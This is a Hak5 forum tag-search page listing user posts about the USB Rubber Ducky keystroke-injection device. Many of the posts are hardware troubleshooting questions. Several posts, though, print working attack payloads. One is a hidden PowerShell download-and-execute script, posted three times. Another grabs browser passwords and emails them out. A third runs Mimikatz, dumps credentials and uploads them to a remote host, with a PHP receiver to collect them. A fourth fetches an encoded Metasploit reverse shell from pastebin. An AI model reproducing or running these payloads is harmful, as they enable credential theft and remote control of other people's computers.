Jump to content

Search the Community

Showing results for tags 'rubber ducky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. Hey Hak5 community, I hope this message finds you well. I wanted to bring up a critical issue regarding the use of the Rubber Ducky with the latest hardware version. It has come to my/our(I dont want to speak for others) attention that using the old firmwares on the new Rubber Ducky can lead to bricking the device. Considering the potential risks involved, I'd like to suggest that the Hak5 team releases a new firmware version along with an updated firmware flasher specifically designed for the new hardware. This will not only address the existing issue but also ensure a smooth and secure user experience. I understand that the Hak5 team is always working hard to improve and enhance the tools we all love, and your attention to this matter is highly appreciated. So if you have time please do it. Also share your thoughts and experiences on this topic, and let's collaborate to make the Rubber Ducky experience as seamless as possible for everyone. Looking forward to hearing from the community and the Hak5 team. Best regards, A User
  2. Hazy

    UK RETAIL

    Hi, Would anyone at HAK5 consider working with a UK retailer?
  3. Does anybody know how and if it is possible to open the Bios with the Rubberducky. I tried it with a script that just spams F1 and also with a script that presses F1 every half second. None of those worked. If i go into the bios mannually and then plug in the Rubber Ducky the script executes without a Problem.
  4. Hi I recently buy rubber Ducky and I have some questions: 1- at frist when I connected my rubber ducky to my pc I can able to see as an usb drive, but know I cant see anything,why!? What should I do!? 2- I am an administrator to my own private network and I have a lot of security features like : Anti viruses,DLP,Firewall, GPO , UAC and etc, when I connect the rubber ducky to one my network computer , nothing happened!!! But I heard and read all of PCs as a keyboard or etc, Could please what should I do that When I connect that usb to the pc I can run my code!?Is it possible to do it with Rubber Ducky or bash bunny (I have bash bunny too)!? 3- Can I use rubber ducky for a pc that is in lock or logoff mode and execute my own code!!? 4- I test Rubber Ducky in my MacBook Pro, but when I connect it to it I face a message that said I have a better keyboard and it doesn’t let the code to run, what should I do not to face this message it apple products!? 5- How can change the usb recognition from keyboard to mouse or printer!? Thanks
  5. Hi Guys I need help creating a payload on the Twin Duck rubber ducky that silently runs tree /a/ /f on the victims computer and then saves the output to the ducky. This is the code that I have so far: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d&echo tree /a /f > echotree.cmd&echotree.cmd > %myd%/results.txt&del echotree.cmd I would like to run it in the Run line. Please help me to optimise it!
  6. Hi everyone, I have a usb Rubber Ducky, in perfect conditions. Last time I used it i was trying to change firmware to a Twin device, and I leave it like 1 year without using it. Yesterday I tried to reset to default firmware but I cant put it on DFU mode, no led ligths turn on, nothing happens when I plugin it. Thanks :'(
  7. What does the root rubber ducky bin file do?
  8. In the HAK5 episode How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky - Hak5 2110 Darren showed a longer way of getting a reverse shell using a longer but a single stage binary of a netcat like tool, but i can't seem to find the original code he used, i kinda want to get a hold of it to see if i can make it run a tiny bit faster but still be a single stage payload. Anyone know where i can get the original(or something close to it) code?
  9. Recently my sony xa ultra running android 6.0.1's phone battery died and after charging it, my 4 digit pin number had changed. Checking the sony forum, I see this has happened to others. This phone has two lockscreens- one at start up which says "android pin" that I can enter the pin in and it accepts, and the second, which had the same 4 digit pin, that no longer accepts it. Unfortunately, my contacts and text messages never backed up to my external SD card (but thank god my photos and videos did) and Im in the middle of what could be a difficult family legal situation where I desperately need those texts. After searching around the web I came across a few ways I could gain access to the phone without risking losing that data. I saw there is a bluetooth exploit, a possible wifi exploit, a way to deliver malware to my own phone via sms and finally rubber ducky. Never thought I would have to hack into my own phone, but here we are LOL. My skills are limited by way of the first couple of options so the rubber ducky seems like the best bet. However, I am not seeing too much info about the rubber ducky's ability to crack an android 6's pin lock, and judging from a link I posted below that was on this forum, it seems like it could work. That said, I have found a few tutorials on how to use the rubber ducky and code any changes I need, so I just have a few questions and would really appreciate your expertise here, everyone. 1) does the rubber ducky definitely work on android 6? or am I misreading what I find on the forums? 2) is there another way I am not aware of? I dont want to manually enter 10,000 pin combinations, but I am desperate enough that I actually have an excel file with all the possible combinations and have started entering them from 0000....LOL 3) and if the rubber ducky does work on android 6, does anyone know if any of the code can work straight out of the box with the sony xa ultra? I found the github links and tutorial, but I dont want to make any missteps. Thank you for your time. This has been driving my nuts. If anything, ive gotten a crash course over the last 15 hours of googling on how my phone can be protected from hackers LOL LOL
  10. Hi I realize the all the scripts only work at the second try. Firsttime I plug in the rubber ducky it never works. It looks like this is related to the installation of the stick on the new system. Second plug in it works fine. Do you have the same problem? Is there any solution for this? Thanks for your feedback CR
  11. Hello Hackers !!! I am new into infosec practically i was learning before but now into industry work so i am fed up of searching different methodology, tools, frameworks. I am stucked with something real life scenarios, there is wifi router which have 10 users. Me as admin of that router, how can i access these 10 users (PC, Andriod, etc) ? I tried wireshark, and many other stuff didnt get anything suitable? can i do this via adding a default welcome page to my router if some one connect will have to download something or something like this? a Newbie need help ;D
  12. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  13. Hello I recently purchased a USB Rubber Ducky and I soon flashed it with twin duck. I then a script on the SD card and plug it in to test the payload. The ducky is just flashing from Green to red countinously. A little help would be great. Thank you, Cassetti
  14. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  15. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  16. Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  17. Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  18. Hi, I've been trying to set up the script for some time, which is the following: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style, in the first part it says the following: REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" ENTER DELAY 15000 Where can I upload the files and how? The rx.php where it is put, on the server? <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> How do I execute it? I would very much appreciate someone helping me step by step to do it.
  19. Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius
  20. I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  21. I posted this in a seperate HAK5 forum room. How do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.
  22. hi guys i've a big proble, in the last weeks i won a usb rubber ducky during an hackathon but the replay buttons seems broken. When i press it the rubber ducky doesn't replay the script, what could be the problem?
  23. Hi guys, I just bought the rubber ducky and flashed it to the Twin Duck mode. Well the twin duck mode is working pretty much cool infact iam able to browse through files in my SD card and the one which comes with the ducky is also executing a Hello World Payload but when I make my own payload and put the inject.bin file the ducky doesnt show up rather it just show a red light for about a second and then theres no light neither the payload works. Ive tried to swap SD cards but that does'nt solve my problem either?
  24. Hi Guys I am trying to get the PHP working on my Apache install that is detailed here: https://www.hak5.org/gear/duck/what-is-the-best-security-awareness-payload-for-the-usb-rubber-ducky I am looking to get IP and browser details as described. My Apache logs are saying the error is: PHP Parse error: Does anyone have a clue where on this line the error is? I am no PHP guy :) Any help is appreciated. Thanks Phil
  25. biob

    Hak5 artwork

    https://instagram.com/p/BatFZAIA8Pk/ Anyone know where I can find the Packet Squirrel and Ducky version?
×
×
  • Create New...